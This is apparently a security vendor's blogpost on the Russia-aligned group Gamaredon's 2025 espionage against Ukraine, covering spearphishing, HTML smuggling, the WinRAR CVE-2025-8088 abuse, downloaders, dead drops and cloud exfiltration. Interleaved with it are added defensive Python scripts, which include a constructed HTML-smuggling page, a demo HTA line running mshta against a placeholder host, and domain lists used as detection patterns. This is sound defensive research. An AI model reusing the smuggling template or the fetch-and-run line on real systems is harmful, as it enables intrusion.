Cyberespionage has remained a relentless feature of Russia's war against Ukraine. ESET Research has long tracked Gamaredon, one of the most active Russia-aligned advanced persistent threat (APT) groups targeting Ukraine. The group, attributed by the Security Service of Ukraine (SSU) to the 18th Center of Information Security of Russia's FSB, maintained a high operational tempo throughout 2025.
In our latest research, we analyze Gamaredon's activity during 2025, including new tools added to its arsenal, significant shifts in how it protects its network infrastructure, and its growing use of legitimate third-party services to hide both command and control (C&C) information and stolen data. The full technical details are available in our latest white paper.
Key points of this blogpost:
- Throughout 2025, Gamaredon exclusively targeted governmental and military institutions in Ukraine.
- We observed 35 distinct spearphishing campaigns against new targets. The majority of the campaigns were conducted in the second half of the year, and they were significantly larger than previous ones.
- Additional targets were compromised via several custom weaponizers designed for lateral movement.
- Gamaredon operators developed and deployed six new malicious PowerShell tools, which we analyze in our white paper, and resurrected an old VBScript weaponizer – PteroSetup.
- The file stealers PteroVDoor and PteroPSDoor were upgraded to support exfiltration to cloud storage services (Wasabi, Tebi, and Intercolo), which became the primary exfiltration method.
- Gamaredon operators sought new ways to protect their network infrastructure, with their C&C servers now hidden behind various third-party services such as tunnels, workers, DDNS (dynamic DNS), and PaaS (platform as a service).
- They also abused several legitimate messaging, social media, blogging, and paste services as dead drops for resolving C&C servers and distributing payloads.
The white paper is our third in-depth installment describing the tactics, techniques, and procedures (TTPs) of this group, which is believed to operate out of occupied Crimea. In September 2024, we published a white paper covering Gamaredon activities from 2022 and 2023 – Cyberespionage the Gamaredon way: Analysis of toolset used to spy on Ukraine in 2022 and 2023 – and in July 2025, we published a white paper covering Gamaredon activities from 2024 – Gamaredon in 2024: Cranking out spearphishing campaigns against Ukraine with an evolved toolset.
Continued data exfiltration and a new alliance
Throughout 2025, Gamaredon stayed highly active and remained focused exclusively on Ukraine. The group's ultimate goal continues to be the exfiltration of sensitive information and other critical data that could be exploited to support Russian interests in the ongoing war in Ukraine. Gamaredon's actions appear to be closely aligned with Russia's geopolitical objectives, targeting Ukrainian governmental and military institutions to gain an intelligence advantage.
New tooling and cooperation in the first half of the year
While the group took a short operational break in January 2025, Gamaredon spent much of its effort in the first half of the year developing and deploying new tools. We describe them in the Six new tools, mostly delivery-focused section of this blogpost. While we do not provide the exact timestamps for all modifications introduced to the group's tooling, we observed that many updates were made in the lead-up to major holidays in Russia and Crimea. Notably, no updates were observed during or immediately after these holidays, further suggesting that Gamaredon operators are probably government-affiliated employees.
Notably, we uncovered that in early 2025, Gamaredon collaborated with Turla, another Russia-aligned threat actor also linked to the FSB; we documented our findings in our blogpost Gamaredon X Turla collab. This cooperation underscores the potential for coordinated cyberespionage campaigns among Russia-aligned groups, likely to amplify their operational impact. In the past, Gamaredon also collaborated with a threat actor that we discovered and named InvisiMole.
More broadly, 2025 also provided another example of cooperation and task sharing among Russia-aligned actors: we observed the Russia-aligned UAC-0099 group conducting initial access operations and subsequently handing validated targets to Sandworm for follow-up activity. We documented our findings in ESET APT Activity Report Q2 2025–Q3 2025.
Larger and more frequent spearphishing campaigns in the second half
In the second half of the year, the group shifted more toward larger and more frequent spearphishing campaigns; during 2025, we identified 35 of these. As in previous years, most campaigns used archive attachments or XHTML files employing HTML smuggling to deliver malicious HTA downloaders, which in turn fetched the VBScript downloader PteroSand and additional payloads. We also observed campaigns that probably used malicious links instead of attachments.
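As an added illustration of the delivery chain just described (an analyst-side example written for this article, not code from ESET, the white paper, or any Gamaredon sample), the function below takes an HTML/XHTML page, looks for the browser-side HTML-smuggling pattern (base64 text decoded with atob, wrapped in a Blob, and pushed to the user through a download link or msSaveOrOpenBlob), decodes any embedded base64 blobs, and reports whether the decoded content looks like an HTA. The sample page is constructed inline and carries a harmless HTA stub so the extractor has something to find; the marker lists, the 40-character base64 threshold and the file name are assumptions.

```python
import base64
import binascii
import re
from dataclasses import dataclass
from typing import List, Optional, Tuple

# Constructed sample: a minimal HTML-smuggling page of the kind described above. The
# embedded "payload" is a harmless HTA stub that only closes itself; it is NOT a
# Gamaredon sample, and the download name is invented.
_BENIGN_HTA = (
    '<html><head><hta:application id="x" showintaskbar="no"/>'
    '<script language="VBScript">close()</script></head></html>'
)
SAMPLE_SMUGGLING_PAGE = """<!DOCTYPE html>
<html><body><p>Loading document...</p>
<script>
var data = "%s";
var bytes = Uint8Array.from(atob(data), c => c.charCodeAt(0));
var blob = new Blob([bytes], {type: "application/octet-stream"});
var a = document.createElement("a");
a.href = URL.createObjectURL(blob);
a.download = "document.hta";
document.body.appendChild(a); a.click();
</script></body></html>""" % base64.b64encode(_BENIGN_HTA.encode()).decode()

# Browser-side primitives that together make up HTML smuggling (assumed marker list, lowercase).
SMUGGLING_MARKERS = {
    "atob(": "base64 decode in browser",
    "new blob(": "in-memory file construction",
    "url.createobjecturl(": "object URL for a generated blob",
    ".download": "forced download via anchor attribute",
    "mssaveoropenblob": "legacy IE/Edge save API",
}
# Substrings that identify an HTA / VBScript-driven payload once decoded (assumed list).
HTA_MARKERS = ("<hta:application", 'language="vbscript"', "activexobject", "wscript.shell")
# Quoted base64 runs long enough to be a smuggled file rather than a short token.
B64_RE = re.compile(r'"([A-Za-z0-9+/]{40,}={0,2})"')


@dataclass
class SmugglingReport:
    markers: List[str]                              # smuggling primitives seen in the page
    payloads: List[Tuple[Optional[str], str, int]]  # (download name, kind, size in bytes)

    @property
    def is_smuggling(self) -> bool:
        # Two or more primitives plus at least one decodable blob is a strong signal.
        return len(self.markers) >= 2 and bool(self.payloads)


def _decode_b64(candidate: str) -> Optional[bytes]:
    try:
        return base64.b64decode(candidate, validate=True)
    except (ValueError, binascii.Error):
        return None


def analyze_html(html: str) -> SmugglingReport:
    lowered = html.lower()
    markers = [desc for key, desc in SMUGGLING_MARKERS.items() if key in lowered]
    name_match = re.search(r'\.download\s*=\s*"([^"]+)"', html)
    download_name = name_match.group(1) if name_match else None
    payloads = []
    for candidate in B64_RE.findall(html):
        raw = _decode_b64(candidate)
        if raw is None:
            continue
        text = raw.decode("latin-1").lower()   # latin-1 never fails, so binary blobs are safe
        kind = "hta" if any(m in text for m in HTA_MARKERS) else "unknown"
        payloads.append((download_name, kind, len(raw)))
    return SmugglingReport(markers=markers, payloads=payloads)


if __name__ == "__main__":
    report = analyze_html(SAMPLE_SMUGGLING_PAGE)
    print(report.is_smuggling, report.markers, report.payloads)
```

The base64 threshold is deliberately loose; in triage the decoded blob should be handed to the usual static tooling, since the same page pattern is used to smuggle archives and executables as well as HTAs.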
Figure 1 shows a chart of unique samples of HTA downloaders delivered per month in Gamaredon spearphishing campaigns. Note that these figures represent minimums for spearphishing attempts, as one HTA downloader may target multiple individuals, and individuals may be targeted in multiple campaigns within the same month.

What changed most noticeably was the tempo. Gamaredon was much more active in the second half of the year, when campaigns became both more frequent and larger in scale. Late in the year, the group also introduced a new technique – from September 26th, 2025 onward, it began abusing CVE-2025-8088, a path traversal vulnerability in WinRAR, to place its usual malicious HTA downloader into the victim's Startup folder. That allowed the downloader to execute on the next login, adding persistence to a compromise chain that had previously relied more heavily on user interaction.
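The Startup-folder persistence described above is cheap to hunt for. The following is an added example (written for this article, not ESET's tooling) that lists script-type files in the per-user and all-users Startup folders and, for each scriptable file, extracts URLs and the COM/shell indicators typical of HTA downloaders. The folder locations are derived from the APPDATA and PROGRAMDATA environment variables, the extension and indicator lists are assumptions, and the demo function builds a temporary folder holding a constructed sample so the code runs on any platform.

```python
import os
import re
import tempfile
from pathlib import Path
from typing import Dict, Iterable, List

# File types that execute on login when dropped into a Startup folder (assumed list).
SCRIPT_EXTENSIONS = {".hta", ".vbs", ".vbe", ".js", ".jse", ".wsf", ".ps1", ".cmd", ".bat", ".lnk"}
# Shortcuts are listed but not parsed; everything else is read as text.
TEXT_EXTENSIONS = SCRIPT_EXTENSIONS - {".lnk"}
# Strings typical of HTA downloaders: COM objects, shell-out, script-host re-invocation (assumed list).
INDICATORS = {
    "activexobject": "COM object instantiation",
    "wscript.shell": "shell execution object",
    "msxml2.xmlhttp": "HTTP download object",
    "mshta": "mshta invocation",
    "powershell": "PowerShell invocation",
}
URL_RE = re.compile(r"https?://[^\s\"'<>]+")


def default_startup_folders() -> List[Path]:
    """Per-user and all-users Startup folders, derived from environment variables (assumed layout)."""
    folders = []
    appdata, programdata = os.environ.get("APPDATA"), os.environ.get("PROGRAMDATA")
    if appdata:
        folders.append(Path(appdata) / "Microsoft" / "Windows" / "Start Menu" / "Programs" / "Startup")
    if programdata:
        folders.append(Path(programdata) / "Microsoft" / "Windows" / "Start Menu" / "Programs" / "StartUp")
    return folders


def inspect_startup(folders: Iterable[Path]) -> List[Dict]:
    """Return one finding per script-type file found in the given folders."""
    findings = []
    for folder in folders:
        folder = Path(folder)
        if not folder.is_dir():
            continue
        for entry in sorted(folder.iterdir()):
            suffix = entry.suffix.lower()
            if not entry.is_file() or suffix not in SCRIPT_EXTENSIONS:
                continue
            finding = {"path": str(entry), "indicators": [], "urls": []}
            if suffix in TEXT_EXTENSIONS:
                text = entry.read_bytes().decode("latin-1")  # never raises on odd bytes
                low = text.lower()
                finding["indicators"] = [d for k, d in INDICATORS.items() if k in low]
                finding["urls"] = URL_RE.findall(text)
            findings.append(finding)
    return findings


def demo() -> List[Dict]:
    """Run the check against a temporary folder holding a constructed sample, so it works off-Windows."""
    folder = Path(tempfile.mkdtemp(prefix="startup-demo-"))
    # Constructed stand-in for a dropped HTA downloader; the URL uses a reserved, non-routable name.
    (folder / "update.hta").write_text(
        '<script>new ActiveXObject("WScript.Shell").Run("mshta http://example.invalid/a.hta")</script>'
    )
    (folder / "notes.txt").write_text("benign")
    return inspect_startup([folder])


if __name__ == "__main__":
    for finding in inspect_startup(default_startup_folders()) or demo():
        print(finding)
```

Any .hta in a Startup folder is worth a look on its own; the indicator and URL extraction just saves the first minute of triage and gives something to pivot on.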
Weaponizers for movement beyond the compromised system
Beyond spearphishing, Gamaredon also continued using custom weaponizers for lateral movement. These tools weaponize USB drives, mapped network drives, and even software installers, helping the group spread within or across organizations after the initial compromise.
Six new tools, mostly delivery-focused
Gamaredon introduced six new tools in 2025, all written in PowerShell. Five of them appeared in the first quarter of the year, suggesting that the group spent the early months of 2025 building new delivery chains before shifting more attention to large-scale spearphishing in the second half.
Most of these new tools are relatively simple:
- PteroDee and PteroCache are simple PowerShell downloaders for fetching and executing PowerShell payloads in memory.
- PteroDum serves a similar purpose, but for VBScript payloads, writing them temporarily to disk, executing them, and then deleting them.
- PteroOdd is a tiny downloader used to retrieve a single PowerShell payload via the Telegra.ph API, and based on what we observed, it appears to have been used primarily in cases associated with Gamaredon's collaboration with Turla.
- PteroEffigy is another lightweight downloader, notable mainly for using the GoFile cloud storage service to obtain the next C&C server.
The standout among the new tools is PteroPaste, which is considerably more complex than the others. It combines a downloader, a USB weaponizer, and a runner component used for persistence and orchestration. Early versions of PteroPaste used Rentry as an intermediary staging point for encrypted payloads. Later versions moved away from that approach and instead retrieve an encrypted C&C hostname from Dropbox, decrypt it locally, and then connect to infrastructure hidden behind tunnel services. PteroPaste is also one of the tools involved in the Gamaredon X Turla collaboration that we documented in 2025.
Gamaredon also brought back PteroSetup, an older VBScript weaponizer that had probably been discontinued years earlier. The resurrected version scans fixed, removable, and network drives for installer-like executable files and replaces them with malicious self-extracting archives containing both the original installer and a malicious VBScript downloader. To the victim, the file still appears legitimate, but running it launches both the expected installer and the malicious code.
Overall, the new additions to Gamaredon's arsenal fit a pattern that we have seen before – rather than investing in highly sophisticated malware, the group prefers a larger number of simple tools that can be updated quickly and combined flexibly.
Important updates to previously known tools such as PteroLNK, PteroPSLoad, PteroPSDoor, PteroVDoor, and PteroBox can be found in the white paper.
Advanced network infrastructure
Gamaredon continued to refine its methods for protecting its network infrastructure and hiding its C&C servers. In 2025, the group's reliance on third-party services grew significantly, with tunnel services and serverless worker platforms becoming an increasingly important part of how it hid its real back-end infrastructure.
Tunnel services are legitimate tools that allow a system or application to be exposed to the internet through a provider-controlled domain, without revealing the real server directly. Workers serve a similar purpose, but go a step further: instead of simply forwarding traffic, they are serverless platforms that can run code and process requests before passing them on. In practice, both help obscure the underlying infrastructure and make disruption more difficult.
Tunnels, workers, and a return to DDNS
By the end of 2024, Gamaredon was already relying heavily on Cloudflare tunnels (trycloudflare.com) to conceal its infrastructure, and in 2025 it expanded that approach further. In May, we began seeing the group hide C&C servers behind Cloudflare Workers (workers.dev), and in June it added Microsoft's devtunnels.ms and Loophole (loophole.site). These services were often used together, with one acting as the primary communication path and others serving as fallbacks.
In several isolated cases, we also observed experiments with other tunnel services, such as loca.lt and bore.pub, but these did not appear to become part of the group's regular toolkit.
Gamaredon also returned to a technique that had once been a hallmark of its operations: dynamic DNS (DDNS). After several years of relying more heavily on registered domains, the group again began using No-IP domains across multiple tools, especially in HTA downloaders delivered in spearphishing campaigns. In parallel, we observed Gamaredon abuse platform-as-a-service offerings from Clever Cloud (cleverapps.io) and Supabase (supabase.co) in several campaigns, suggesting that the group is still actively seeking low-cost, disposable infrastructure that blends in with legitimate traffic.
Leveraging an old espionage concept: Dead drops
One of the most important aspects of Gamaredon's 2025 operations was its heavy use of so-called dead-drop services. The term comes from traditional espionage – instead of meeting directly, one operative leaves information in a public or hidden location and another retrieves it later. Online, the principle is similar. Rather than embedding the real malicious server directly in malware, operators place that information on a legitimate website or platform, and the malware retrieves it from there. This means that the malware may first contact a public page on a legitimate service, read a hidden or staged value from it, and only then connect to the actual C&C server.
This approach gives attackers several advantages. It makes their operations more flexible, because they can switch servers quickly. It also complicates blocking, because defenders may be reluctant to block legitimate and widely used services outright.
In 2025, Gamaredon abused numerous services in this way: Telegram channels (via t.me, Telegram's official URL shortener service), posts on the Telegra.ph (telegra.ph) and Teletype (teletype.in) platforms, rentry.co, write.as, Dropbox, GoFile, the social networks DEV Community (dev.to) and Mastodon (mastodon.social), lesma (lesma.eu), nopaste.net, and Paste.ee (pastee.dev). In some cases, these services were used to publish updated C&C information. In others, they were used to deliver payloads or cloud-storage configuration data.
Compared to 2024, we also observed a shift in how Gamaredon used these dead drops. Rather than simply publishing raw C&C IP addresses, operators increasingly used them to point malware to infrastructure already hidden behind tunnels or workers. In other words, the dead drop often no longer revealed the real server directly; instead, it pointed to another intermediate layer.
Cloud storage became the preferred exfiltration channel
The other major infrastructure shift we observed was on the data-exfiltration side. Gamaredon upgraded two of its flagship file stealers, PteroPSDoor and PteroVDoor, to upload stolen files to S3-compatible cloud storage services – providers that support the Amazon S3 API, allowing the same tools and code to work across different storage vendors. Over the course of the year, configurations moved from Wasabi (wasabisys.com) to Tebi (tebi.io) and then to Intercolo (de-fra.i3storage.com), which by December had become the primary exfiltration destination.
At the same time, PteroBox continued to upload files to Dropbox, and one newer variant used the rclone utility to do so.
Uploading stolen files to cloud storage reduces the need for Gamaredon to maintain its own infrastructure for receiving large amounts of stolen data. It also helps malicious traffic blend in with access to legitimate storage providers. Essentially, Gamaredon increasingly uses third-party services not only to hide where instructions come from, but also to hide where stolen data goes.
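Putting the infrastructure observations of this section together (tunnels, workers, DDNS and PaaS fronting the C&C; dead drops that point at them; S3-compatible and Dropbox uploads for exfiltration), here is an added detection example that runs over constructed proxy-log lines. It is written for this article and is not ESET code or an ESET detection rule. The suffix lists are taken from the services named in the post, except for the No-IP suffixes, which are an assumed subset of that provider's free domains; the log format, hostnames, the 512 KiB upload threshold and the five-minute correlation window are assumptions. The S3 check keys on the AWS Signature Version 4 Authorization scheme (AWS4-HMAC-SHA256), which any S3-API client sends regardless of vendor, so it survives the provider hopping from Wasabi to Tebi to Intercolo described above.

```python
from datetime import datetime, timedelta
from typing import Dict, Iterable, List, Optional

# Domain suffixes grouped by the role they play in the infrastructure described above.
TUNNEL_OR_WORKER = ("trycloudflare.com", "workers.dev", "devtunnels.ms",
                    "loophole.site", "loca.lt", "bore.pub")
# No-IP suffixes are an assumed subset of that provider's free domains; PaaS entries are from the post.
DDNS_OR_PAAS = ("ddns.net", "hopto.org", "zapto.org", "no-ip.org",
                "cleverapps.io", "supabase.co")
DEAD_DROP = ("t.me", "telegra.ph", "teletype.in", "rentry.co", "write.as",
             "dev.to", "mastodon.social", "lesma.eu", "nopaste.net", "pastee.dev")
CLOUD_STORAGE = ("dropbox.com", "dropboxapi.com", "gofile.io")  # dead drop on GET, exfil target on upload
S3_COMPATIBLE = ("wasabisys.com", "tebi.io", "i3storage.com")
ROLE_TABLE = [("tunnel/worker", TUNNEL_OR_WORKER), ("ddns/paas", DDNS_OR_PAAS),
              ("dead-drop", DEAD_DROP), ("cloud-storage", CLOUD_STORAGE),
              ("s3-compatible", S3_COMPATIBLE)]

# Constructed proxy log (assumed format): timestamp|src|method|host|path|bytes_out|user_agent|auth_scheme.
# Hostnames, paths and the source addresses are invented; only the Dropbox upload endpoint is real.
SAMPLE_LOG = """
2025-10-02T09:14:05|10.0.0.12|GET|t.me|/s/somechannel|412|Mozilla/5.0|-
2025-10-02T09:14:09|10.0.0.12|GET|quiet-tree-1234.trycloudflare.com|/c|1800|Mozilla/5.0|-
2025-10-02T09:20:31|10.0.0.12|PUT|s3.eu-central-2.wasabisys.com|/bkt/doc.pdf|2097152|aws-sdk|AWS4-HMAC-SHA256
2025-10-02T09:21:02|10.0.0.12|POST|content.dropboxapi.com|/2/files/upload|1048576|rclone/v1.68.0|Bearer
2025-10-02T10:00:00|10.0.0.40|GET|www.example.org|/|512|Mozilla/5.0|-
"""


def host_role(host: str) -> Optional[str]:
    host = host.lower().rstrip(".")
    for role, suffixes in ROLE_TABLE:
        if any(host == s or host.endswith("." + s) for s in suffixes):
            return role
    return None


def parse_event(line: str) -> Dict:
    ts, src, method, host, path, size, ua, auth = line.strip().split("|")
    return {"ts": datetime.fromisoformat(ts), "src": src, "method": method.upper(),
            "host": host, "path": path, "bytes_out": int(size), "ua": ua,
            "auth": auth, "role": host_role(host)}


def exfil_reason(ev: Dict, min_bytes: int = 512 * 1024) -> Optional[str]:
    """Explain why an event looks like a bulk upload to a storage service, or return None."""
    if ev["method"] not in ("PUT", "POST") or ev["bytes_out"] < min_bytes:
        return None
    sigv4 = ev["auth"].startswith("AWS4-HMAC-SHA256")  # vendor-independent S3 API fingerprint
    if sigv4 or ev["role"] == "s3-compatible":
        return "S3-API upload%s to %s" % (" (SigV4)" if sigv4 else "", ev["host"])
    if ev["role"] == "cloud-storage":
        tool = "rclone" if ev["ua"].lower().startswith("rclone/") else "client"
        return "%s upload to %s" % (tool, ev["host"])
    return None


def analyze(lines: Iterable[str], window: timedelta = timedelta(minutes=5)) -> List[Dict]:
    events = sorted((parse_event(l) for l in lines if l.strip()), key=lambda e: e["ts"])
    alerts, last_dead_drop = [], {}  # last_dead_drop: src -> most recent dead-drop read
    for ev in events:
        if ev["role"] in ("dead-drop", "cloud-storage") and ev["method"] == "GET":
            last_dead_drop[ev["src"]] = ev
        elif ev["role"] in ("tunnel/worker", "ddns/paas"):
            prior = last_dead_drop.get(ev["src"])
            if prior and ev["ts"] - prior["ts"] <= window:
                # Dead-drop read immediately followed by first contact with fronted infrastructure.
                alerts.append({"type": "dead-drop-resolution", "src": ev["src"],
                               "dead_drop": prior["host"], "c2_host": ev["host"]})
            else:
                alerts.append({"type": "fronted-infrastructure", "src": ev["src"], "c2_host": ev["host"]})
        reason = exfil_reason(ev)
        if reason:
            alerts.append({"type": "exfiltration", "src": ev["src"], "detail": reason})
    return alerts


if __name__ == "__main__":
    for alert in analyze(SAMPLE_LOG.splitlines()):
        print(alert)
```

The suffix lists will produce noise in environments that legitimately use these developer services, which is exactly the point the post makes about why the group picks them; the dead-drop-to-tunnel sequence and the SigV4 upload from a host that has no business talking to an S3 endpoint are the parts that still stand out.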
Conclusion
Gamaredon continued to focus its cyberespionage activity exclusively on Ukraine throughout 2025, and nothing in ESET telemetry suggests that this will change in the near future.
While the six new tools introduced in 2025 were, for the most part, simple downloaders, the more important development was the continued evolution of the infrastructure supporting the group's operations. Gamaredon further expanded its use of dead drops, tunnels, workers, dynamic DNS, and cloud storage, making its operations more flexible and harder to disrupt.
As in previous years, the group compensated for the relative simplicity of its malware with persistence, frequent updates, and an increasingly creative abuse of legitimate online services. As long as Russia's war against Ukraine continues, we expect Gamaredon to remain a significant cyberespionage threat to Ukrainian institutions.
IoCs
A comprehensive list of indicators of compromise (IoCs) can be found in our GitHub repository and the Gamaredon white paper.